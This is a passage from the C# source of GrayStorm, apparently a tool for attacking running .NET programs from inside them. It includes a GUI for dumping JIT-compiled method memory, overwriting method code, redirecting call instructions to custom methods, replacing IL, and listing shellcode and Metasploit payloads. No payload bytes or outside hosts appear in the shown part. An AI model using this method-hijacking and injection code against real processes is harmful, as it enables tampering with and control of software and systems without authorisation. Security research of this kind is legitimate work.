78 | System.Windows.Forms.TreeNode Assemblies = new TreeNode(assemblyName.ToString());
79 | domainAssemblies.Add(Assemblies, asm);
80 | hierarchyViewer_TN.Nodes.Add(Assemblies);
81 | }
82 | hierarchyViewer_TN.Sort();
83 | }
84 | private void hierarchyViewer_TN_AfterSelect(object sender, TreeViewEventArgs e)
85 | {
86 | TreeNode theSelectedNode = hierarchyViewer_TN.SelectedNode;
87 |
88 | if (theSelectedNode != null)
89 | {
90 | if (domainAssemblies.ContainsKey(theSelectedNode) && !assembliesCreated.Contains(theSelectedNode))
91 | {
92 | Assembly assemblySelected = domainAssemblies[theSelectedNode];
93 |
94 | Type[] types = assemblySelected.GetTypes();
95 | foreach (Type type in types)
96 | {
97 | System.Windows.Forms.TreeNode asmClass = new TreeNode(type.ToString());
98 | makeMethodandFunctionList(asmClass, type);
99 | domainClasses.Add(asmClass, type);
100 | theSelectedNode.Nodes.Add(asmClass);
101 | }
102 | assembliesCreated.Add(theSelectedNode);
103 | hierarchyViewer_TN.Sort();
104 | }
105 | else if (methods.ContainsKey(theSelectedNode))
106 | {
107 | MethodInfo methodSelected = methods[theSelectedNode];
108 |
109 | if (selectedMethod != null && methodSelected != null)
110 | selectedMethod(methodSelected, theSelectedNode);
111 | }
112 | else if (constructors.ContainsKey(theSelectedNode))
113 | {
114 | ConstructorInfo constructorSelected = constructors[theSelectedNode];
115 |
116 | Assembly assemblySelected = domainAssemblies[theSelectedNode.Parent.Parent];
117 | domainTraverser.assemblyInfo = assemblySelected;
118 | domainTraverser.typeInfo = assemblySelected.GetType(theSelectedNode.Parent.Text);
119 |
120 | if (selectedConstructor != null && constructorSelected != null)
121 | selectedConstructor(constructorSelected, theSelectedNode);
122 | }
123 | }
124 | }
125 |
126 | private void makeMethodandFunctionList(TreeNode parent, Type classSelected)
127 | {
128 | try
129 | {
130 | MethodInfo[] methodInfo = classSelected.GetMethods(BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.Public | BindingFlags.DeclaredOnly);
131 | ConstructorInfo[] constructorList = classSelected.GetConstructors(BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic);
132 |
133 | foreach (MethodInfo classMethods in methodInfo)
134 | {
135 | System.Windows.Forms.TreeNode asmMethod = new TreeNode(classMethods.ToString());
136 | parent.Nodes.Add(asmMethod);
137 | methods.Add(asmMethod, classMethods);
138 | }
139 |
140 | foreach (ConstructorInfo constructorInfo in constructorList)
141 | {
142 | object fullConType = constructorInfo as object;
143 | System.Windows.Forms.TreeNode asmMethod = new TreeNode(fullConType.ToString());
144 | parent.Nodes.Add(asmMethod);
145 | constructors.Add(asmMethod, constructorInfo);
146 | }
147 | }
148 | catch { }
149 | }
150 | #endregion treeNode
151 |
152 | #region rightClickMenu
153 |
154 | private void dumpToolStripMenuItem_Click(object sender, EventArgs e)
155 | {
156 | grayStorm._memoryHijacker.setDisassembleUnchecked();
157 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
158 | }
159 |
160 | private void disassembleToolStripMenuItem_Click(object sender, EventArgs e)
161 | {
162 | grayStorm._memoryHijacker.setDisassembleChecked();
163 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
164 | }
165 |
166 | private void reDumpToolStripMenuItem_Click(object sender, EventArgs e)
167 | {
168 | int containedIndex = getContainedIndex();
169 | if (containedIndex > 0)
170 | {
171 | methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
172 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
173 | }
174 | }
175 |
176 | private void restoreMethodToolStripMenuItem_Click(object sender, EventArgs e)
177 | {
178 | int containedIndex = getContainedIndex();
179 | if (containedIndex == -1)
180 | return;
181 | try
182 | {
183 | GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[containedIndex].oldMethod;
184 | methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
185 | methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
186 | }
187 | catch { }
188 | }
189 |
190 | private void showILCodeToolStripMenuItem_Click(object sender, EventArgs e)
191 | {
192 | grayStorm._memoryHijacker.getIL_BT_Click(null, null);
193 | }
194 |
195 | private void replaceMethodWithCustomCToolStripMenuItem_Click(object sender, EventArgs e)
196 | {
197 | MethodInfo replacement = grayStorm._memoryHijacker.dynamicMethods_LB.SelectedItem as MethodInfo;
198 | if (replacement == null || domainTraverser.currentMethod == null)
199 | return;
200 | System.Windows.Forms.MessageBox.Show("Replacing with " + replacement.Name);
201 | dynamic_C.methodReplacer.replaceIL(domainTraverser.currentMethod, replacement);
202 | }
203 |
204 | public static int savedCachePtr = -1;
205 | private void cacheReplacerMethodToolStripMenuItem_Click(object sender, EventArgs e)
206 | {
207 | int containedIndex = getContainedIndex();
208 | if (containedIndex == -1)
209 | {
210 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
211 | containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
212 | }
213 | savedCachePtr = containedIndex;
214 | }
215 |
216 | private int getContainedIndex()
217 | {
218 | if (domainTraverser.currentMethod != null)
219 | return methodHelpers.containedInList(domainTraverser.currentMethod);
220 | else return -1;
221 | }
222 |
223 | private void normalToolStripMenuItem_Click(object sender, EventArgs e)
224 | {
225 | int containedIndex = getContainedIndex();
226 | if (containedIndex >= 0)
227 | {
228 | methodInvoking.fireMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr, 0);
229 | }
230 | else
231 | {
232 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
233 | normalToolStripMenuItem_Click(null, null);
234 | }
235 | }
236 |
237 | private void withINT3ToolStripMenuItem_Click(object sender, EventArgs e)
238 | {
239 | int containedIndex = getContainedIndex();
240 | if (containedIndex >= 0)
241 | {
242 | methodInvoking.fireMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr, 1);
243 | }
244 | else
245 | {
246 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
247 | withINT3ToolStripMenuItem_Click(null, null);
248 | }
249 | }
250 |
251 | #endregion rightClickMenu
252 | }
253 | }
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 17, 17
122 |
123 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
3 | partial class memoryHijacker
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Component Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.components = new System.ComponentModel.Container();
32 | this.editor_RTB = new System.Windows.Forms.RichTextBox();
33 | this.assmblyControlFlow = new System.Windows.Forms.ContextMenuStrip(this.components);
34 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
35 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
36 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
37 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
38 | this.changeCallAddressFromSelectedMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
39 | this.dumpAsm_BT = new System.Windows.Forms.Button();
40 | this.getIL_BT = new System.Windows.Forms.Button();
41 | this.disassemble_CB = new System.Windows.Forms.CheckBox();
42 | this.splitContainer1 = new System.Windows.Forms.SplitContainer();
43 | this.dynamicMethods_LB = new System.Windows.Forms.ListBox();
44 | this.dynamicControl = new System.Windows.Forms.ContextMenuStrip(this.components);
45 | this.fireMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
46 | this.replaceMethodWithCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
47 | this.getILCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
48 | this.dumpAssemblyCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
49 | this.assmblyControlFlow.SuspendLayout();
50 | this.splitContainer1.Panel1.SuspendLayout();
51 | this.splitContainer1.Panel2.SuspendLayout();
52 | this.splitContainer1.SuspendLayout();
53 | this.dynamicControl.SuspendLayout();
54 | this.SuspendLayout();
55 | //
56 | // editor_RTB
57 | //
58 | this.editor_RTB.ContextMenuStrip = this.assmblyControlFlow;
59 | this.editor_RTB.Dock = System.Windows.Forms.DockStyle.Fill;
60 | this.editor_RTB.Location = new System.Drawing.Point(0, 0);
61 | this.editor_RTB.Name = "editor_RTB";
62 | this.editor_RTB.Size = new System.Drawing.Size(356, 391);
63 | this.editor_RTB.TabIndex = 0;
64 | this.editor_RTB.Text = "";
65 | //
66 | // assmblyControlFlow
67 | //
68 | this.assmblyControlFlow.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
69 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem,
70 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem,
71 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem,
72 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem,
73 | this.changeCallAddressFromSelectedMethodToolStripMenuItem});
74 | this.assmblyControlFlow.Name = "contextMenuStrip2";
75 | this.assmblyControlFlow.Size = new System.Drawing.Size(339, 114);
76 | //
77 | // changeCallAddressFromCuscomC0xFFToolStripMenuItem
78 | //
79 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Name = "changeCallAddressFromCuscomC0xFFToolStripMenuItem";
80 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
81 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Text = "Change Call Address From Cuscom C# (0xFF)";
82 | this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCuscomC0xFFToolStripMenuItem_Click);
83 | //
84 | // changeCallAddressFromCuscomC0xE8ToolStripMenuItem
85 | //
86 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Name = "changeCallAddressFromCuscomC0xE8ToolStripMenuItem";
87 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
88 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Text = "Change Call Address From Cuscom C# (0xE8)";
89 | this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem_Click);
90 | //
91 | // changeCallAddressFromCachedMethod0xFFToolStripMenuItem
92 | //
93 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Name = "changeCallAddressFromCachedMethod0xFFToolStripMenuItem";
94 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
95 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Text = "Change Call Address from Cached Method (0xFF))";
96 | this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem_Click);
97 | //
98 | // changeCallAddressFromCachedMethod0xE8ToolStripMenuItem
99 | //
100 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Name = "changeCallAddressFromCachedMethod0xE8ToolStripMenuItem";
101 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
102 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Text = "Change Call Address from Cached Method (0xE8)";
103 | this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem_Click);
104 | //
105 | // changeCallAddressFromSelectedMethodToolStripMenuItem
106 | //
107 | this.changeCallAddressFromSelectedMethodToolStripMenuItem.Name = "changeCallAddressFromSelectedMethodToolStripMenuItem";
108 | this.changeCallAddressFromSelectedMethodToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
109 | //
110 | // dumpAsm_BT
111 | //
112 | this.dumpAsm_BT.Location = new System.Drawing.Point(3, 28);
113 | this.dumpAsm_BT.Name = "dumpAsm_BT";
114 | this.dumpAsm_BT.Size = new System.Drawing.Size(177, 38);
115 | this.dumpAsm_BT.TabIndex = 1;
116 | this.dumpAsm_BT.Text = "Dump Assembly";
117 | this.dumpAsm_BT.UseVisualStyleBackColor = true;
118 | this.dumpAsm_BT.Click += new System.EventHandler(this.dumpAsm_BT_Click);
119 | //
120 | // getIL_BT
121 | //
122 | this.getIL_BT.Location = new System.Drawing.Point(3, 95);
123 | this.getIL_BT.Name = "getIL_BT";
124 | this.getIL_BT.Size = new System.Drawing.Size(172, 32);
125 | this.getIL_BT.TabIndex = 2;
126 | this.getIL_BT.Text = "Get IL Code";
127 | this.getIL_BT.UseVisualStyleBackColor = true;
128 | this.getIL_BT.Click += new System.EventHandler(this.getIL_BT_Click);
129 | //
130 | // disassemble_CB
131 | //
132 | this.disassemble_CB.AutoSize = true;
133 | this.disassemble_CB.Location = new System.Drawing.Point(3, 72);
134 | this.disassemble_CB.Name = "disassemble_CB";
135 | this.disassemble_CB.Size = new System.Drawing.Size(83, 17);
136 | this.disassemble_CB.TabIndex = 3;
137 | this.disassemble_CB.Text = "disassemble";
138 | this.disassemble_CB.UseVisualStyleBackColor = true;
139 | //
140 | // splitContainer1
141 | //
142 | this.splitContainer1.Dock = System.Windows.Forms.DockStyle.Fill;
143 | this.splitContainer1.Location = new System.Drawing.Point(0, 0);
144 | this.splitContainer1.Name = "splitContainer1";
145 | //
146 | // splitContainer1.Panel1
147 | //
148 | this.splitContainer1.Panel1.Controls.Add(this.dynamicMethods_LB);
149 | this.splitContainer1.Panel1.Controls.Add(this.getIL_BT);
150 | this.splitContainer1.Panel1.Controls.Add(this.disassemble_CB);
151 | this.splitContainer1.Panel1.Controls.Add(this.dumpAsm_BT);
152 | //
153 | // splitContainer1.Panel2
154 | //
155 | this.splitContainer1.Panel2.Controls.Add(this.editor_RTB);
156 | this.splitContainer1.Size = new System.Drawing.Size(540, 391);
157 | this.splitContainer1.SplitterDistance = 180;
158 | this.splitContainer1.TabIndex = 5;
159 | //
160 | // dynamicMethods_LB
161 | //
162 | this.dynamicMethods_LB.ContextMenuStrip = this.dynamicControl;
163 | this.dynamicMethods_LB.FormattingEnabled = true;
164 | this.dynamicMethods_LB.Location = new System.Drawing.Point(3, 230);
165 | this.dynamicMethods_LB.Name = "dynamicMethods_LB";
166 | this.dynamicMethods_LB.Size = new System.Drawing.Size(172, 147);
167 | this.dynamicMethods_LB.TabIndex = 5;
168 | //
169 | // dynamicControl
170 | //
171 | this.dynamicControl.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
172 | this.fireMethodToolStripMenuItem,
173 | this.replaceMethodWithCustomCToolStripMenuItem,
174 | this.getILCustomCToolStripMenuItem,
175 | this.dumpAssemblyCustomCToolStripMenuItem});
176 | this.dynamicControl.Name = "contextMenuStrip1";
177 | this.dynamicControl.Size = new System.Drawing.Size(250, 92);
178 | //
179 | // fireMethodToolStripMenuItem
180 | //
181 | this.fireMethodToolStripMenuItem.Name = "fireMethodToolStripMenuItem";
182 | this.fireMethodToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
183 | this.fireMethodToolStripMenuItem.Text = "Fire Method";
184 | this.fireMethodToolStripMenuItem.Click += new System.EventHandler(this.fireMethodToolStripMenuItem_Click);
185 | //
186 | // replaceMethodWithCustomCToolStripMenuItem
187 | //
188 | this.replaceMethodWithCustomCToolStripMenuItem.Name = "replaceMethodWithCustomCToolStripMenuItem";
189 | this.replaceMethodWithCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
190 | this.replaceMethodWithCustomCToolStripMenuItem.Text = "Replace Method with Custom C#";
191 | //
192 | // getILCustomCToolStripMenuItem
193 | //
194 | this.getILCustomCToolStripMenuItem.Name = "getILCustomCToolStripMenuItem";
195 | this.getILCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
196 | this.getILCustomCToolStripMenuItem.Text = "Get IL Custom C#";
197 | this.getILCustomCToolStripMenuItem.Click += new System.EventHandler(this.getILCustomCToolStripMenuItem_Click);
198 | //
199 | // dumpAssemblyCustomCToolStripMenuItem
200 | //
201 | this.dumpAssemblyCustomCToolStripMenuItem.Name = "dumpAssemblyCustomCToolStripMenuItem";
202 | this.dumpAssemblyCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
203 | this.dumpAssemblyCustomCToolStripMenuItem.Text = "Dump Assembly Custom C#";
204 | this.dumpAssemblyCustomCToolStripMenuItem.Click += new System.EventHandler(this.dumpAssemblyCustomCToolStripMenuItem_Click);
205 | //
206 | // memoryHijacker
207 | //
208 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
209 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
210 | this.Controls.Add(this.splitContainer1);
211 | this.Name = "memoryHijacker";
212 | this.Size = new System.Drawing.Size(540, 391);
213 | this.assmblyControlFlow.ResumeLayout(false);
214 | this.splitContainer1.Panel1.ResumeLayout(false);
215 | this.splitContainer1.Panel1.PerformLayout();
216 | this.splitContainer1.Panel2.ResumeLayout(false);
217 | this.splitContainer1.ResumeLayout(false);
218 | this.dynamicControl.ResumeLayout(false);
219 | this.ResumeLayout(false);
220 |
221 | }
222 |
223 | #endregion
224 |
225 | public System.Windows.Forms.RichTextBox editor_RTB;
226 | private System.Windows.Forms.Button dumpAsm_BT;
227 | private System.Windows.Forms.Button getIL_BT;
228 | public System.Windows.Forms.CheckBox disassemble_CB;
229 | private System.Windows.Forms.SplitContainer splitContainer1;
230 | public System.Windows.Forms.ListBox dynamicMethods_LB;
231 | private System.Windows.Forms.ContextMenuStrip dynamicControl;
232 | private System.Windows.Forms.ToolStripMenuItem fireMethodToolStripMenuItem;
233 | private System.Windows.Forms.ToolStripMenuItem replaceMethodWithCustomCToolStripMenuItem;
234 | private System.Windows.Forms.ContextMenuStrip assmblyControlFlow;
235 | private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCuscomC0xFFToolStripMenuItem;
236 | private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCuscomC0xE8ToolStripMenuItem;
237 | private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCachedMethod0xFFToolStripMenuItem;
238 | private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCachedMethod0xE8ToolStripMenuItem;
239 | private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromSelectedMethodToolStripMenuItem;
240 | private System.Windows.Forms.ToolStripMenuItem getILCustomCToolStripMenuItem;
241 | private System.Windows.Forms.ToolStripMenuItem dumpAssemblyCustomCToolStripMenuItem;
242 | }
243 | }
244 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
13 | public partial class memoryHijacker : UserControl
14 | {
15 | public memoryHijacker()
16 | {
17 | InitializeComponent();
18 |
19 | }
20 | public StorageInformation currentMethod;
21 |
22 | #region buttons
23 |
24 | public void dumpAsm_BT_Click(object sender, EventArgs e)
25 | {
26 | editor_RTB.Clear();
27 | IntPtr trueIntPtr = IntPtr.Zero;
28 | Delegate targetMethodDelegate = null;
29 |
30 | if (domainTraverser.currentMethod == null || domainTraverser.currentMethod.Name.Contains("Dispose"))
31 | return;
32 | int containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
33 | if (containedIndex == -1 || methodHelpers.StorageInformationArrayList[containedIndex].dumped != true)
34 | {
35 | byte[] memory;
36 | if (containedIndex != -1)
37 | {
38 | memory = assemblyHelpers.DumpAFunction(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
39 | grayStorm._addrOfMethod_TB.Text = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr.ToString("X");
40 | if (memory == null)
41 | {
42 | editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
43 | return;
44 | }
45 | else
46 | {
47 | methodHelpers.StorageInformationArrayList[containedIndex].memory = memory;
48 | methodHelpers.StorageInformationArrayList[containedIndex].dumped = true;
49 | }
50 | }
51 | else
52 | {
53 | methodInvoking invokeMethods = new methodInvoking();
54 | System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(domainTraverser.currentMethod.MethodHandle); //JIT the method!
55 | grayStorm._addrOfMethod_TB.Text = domainTraverser.currentMethod.MethodHandle.GetFunctionPointer().ToString("X");
56 | targetMethodDelegate = invokeMethods.getMethodDelegate(domainTraverser.currentMethod); //Get the Delegate of the method.
57 | trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
58 | memory = assemblyHelpers.DumpAFunction(trueIntPtr);
59 | if (memory == null)
60 | {
61 | editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
62 | return;
63 | }
64 | else
65 | {
66 | currentMethod = new StorageInformation();
67 | currentMethod.memory = memory;
68 | currentMethod.methodSignature = domainTraverser.currentMethod;
69 | currentMethod.dumped = true;
70 | currentMethod.methodIntPtr = trueIntPtr;
71 | currentMethod.oldMethod = currentMethod.memory;
72 | currentMethod.methodDelegate = targetMethodDelegate;
73 | methodHelpers.StorageInformationArrayList.Add(currentMethod);
74 | containedIndex = methodHelpers.StorageInformationArrayList.Count - 1;
75 | grayStorm._addrOfMethod_TB.Text = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr.ToString("X");
76 | }
77 | }
78 | }
79 |
80 | if (disassemble_CB.Checked)
81 | {
82 | beaEngine.disassemble disasm = new beaEngine.disassemble();
83 | disasm.disassembler(methodHelpers.StorageInformationArrayList[containedIndex].memory, this.editor_RTB, methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
84 | }
85 | else
86 | {
87 | foreach (byte b in methodHelpers.StorageInformationArrayList[containedIndex].memory)
88 | {
89 | editor_RTB.AppendText(String.Format("0x{0:X2}\n", b));
90 | }
91 | }
92 | }
93 |
94 | public void getIL_BT_Click(object sender, EventArgs e)
95 | {
96 | if (domainTraverser.currentMethod == null)
97 | return;
98 | editor_RTB.Clear();
99 | formatOutput formatOutput = new formatOutput();
100 | foreach (ILInstruction instruciton in ILInstructionLoader.GetInstructions(domainTraverser.currentMethod))
101 | {
102 | editor_RTB.AppendText(instruciton.Offset.ToString("X4") + " " + instruciton.OpCode + " " + formatOutput.setUpDataFormat(instruciton) + "\n");
103 | }
104 | }
105 |
106 | private void fireMethodToolStripMenuItem_Click(object sender, EventArgs e)
107 | {
108 | if (dynamicMethods_LB.SelectedItem != null)
109 | {
110 | MethodInfo customMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
111 | methodInvoking.fireMethod(customMethod.MethodHandle.GetFunctionPointer(), 0);
112 | }
113 | }
114 |
115 | private void changeCallAddressFromCuscomC0xFFToolStripMenuItem_Click(object sender, EventArgs e)
116 | {
117 | IntPtr cSharpIntPtr = getAddressForFire();
118 | assemblyControlFlow.replaceDwordCall(cSharpIntPtr);
119 | }
120 |
121 | private void changeCallAddressFromCuscomC0xE8ToolStripMenuItem_Click(object sender, EventArgs e)
122 | {
123 | IntPtr cSharpIntPtr = getAddressForFire();
124 | assemblyControlFlow.replaceE8Call(cSharpIntPtr);
125 | }
126 |
127 | private void changeCallAddressFromCachedMethod0xFFToolStripMenuItem_Click(object sender, EventArgs e)
128 | {
129 | if (hierarchyViewer.savedCachePtr == -1)
130 | return;
131 | assemblyControlFlow.replaceDwordCall(methodHelpers.StorageInformationArrayList[hierarchyViewer.savedCachePtr].methodIntPtr);
132 | }
133 |
134 | private void changeCallAddressFromCachedMethod0xE8ToolStripMenuItem_Click(object sender, EventArgs e)
135 | {
136 | if (hierarchyViewer.savedCachePtr == -1)
137 | return;
138 | assemblyControlFlow.replaceE8Call(methodHelpers.StorageInformationArrayList[hierarchyViewer.savedCachePtr].methodIntPtr);
139 | }
140 |
141 | private void getILCustomCToolStripMenuItem_Click(object sender, EventArgs e)
142 | {
143 | var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
144 | if (selectedMethod == null)
145 | return;
146 | editor_RTB.Clear();
147 | formatOutput formatOutput = new formatOutput();
148 | foreach (ILInstruction instruciton in ILInstructionLoader.GetInstructions(selectedMethod))
149 | {
150 | editor_RTB.AppendText(instruciton.Offset.ToString("X4") + " " + instruciton.OpCode + " " + formatOutput.setUpDataFormat(instruciton) + "\n");
151 | }
152 | }
153 |
154 |
155 | private void dumpAssemblyCustomCToolStripMenuItem_Click(object sender, EventArgs e)
156 | {
157 | var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
158 | methodInvoking invokeMethods = new methodInvoking();
159 | byte[] memory;
160 | if (selectedMethod != null)
161 | {
162 | System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(selectedMethod.MethodHandle); //JIT the method!
163 | Delegate targetMethodDelegate = invokeMethods.getMethodDelegate(domainTraverser.currentMethod); //Get the Delegate of the method.
164 | IntPtr trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
165 | memory = assemblyHelpers.DumpAFunction(trueIntPtr);
166 | if (memory == null)
167 | {
168 | editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
169 | return;
170 | }
171 | else
172 | {
173 | foreach (byte b in memory)
174 | {
175 | editor_RTB.AppendText(String.Format("0x{0:X2}\n", b));
176 | }
177 | }
178 | }
179 | }
180 | #endregion buttons
181 |
182 | #region helpers
183 | public void setDisassembleChecked()
184 | {
185 | disassemble_CB.Checked = true;
186 | }
187 |
188 | public void setDisassembleUnchecked()
189 | {
190 | disassemble_CB.Checked = false;
191 | }
192 |
193 | private IntPtr getAddressForFire()
194 | {
195 | var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
196 | if (selectedMethod == null)
197 | return IntPtr.Zero;
198 | IntPtr trueIntPtr = IntPtr.Zero;
199 | Delegate targetMethodDelegate = null;
200 | methodInvoking invokeMethods = new methodInvoking();
201 | targetMethodDelegate = invokeMethods.getMethodDelegate(selectedMethod); //Get the Delegate of the method.
202 | trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
203 | return trueIntPtr;
204 | }
205 | #endregion helpers
206 | }
207 | }
208 |
209 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 172, 17
122 |
123 |
124 | 17, 17
125 |
126 |
--------------------------------------------------------------------------------
/GUI/shellcode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
13 | public partial class shellcode : UserControl
14 | {
15 | #region init
16 | GrayStorm.dataBox payload;
17 |
18 | public shellcode()
19 | {
20 | InitializeComponent();
21 | }
22 |
23 | public void loadShellcode()
24 | {
25 | foreach (var payloads in GrayStorm.shellcodes.payloads.payloadsList())
26 | payloads_LB.Items.Add(payloads);
27 |
28 | foreach (var metaPayloads in GrayStorm.shellcodes.payloads.metaSploitList())
29 | metaSploit_LB.Items.Add(metaPayloads);
30 | }
31 | #endregion init
32 |
33 | #region listBox selecting
34 | private void payloads_LB_SelectedIndexChanged(object sender, EventArgs e)
35 | {
36 | if (payloads_LB.SelectedIndex == -1)
37 | return;
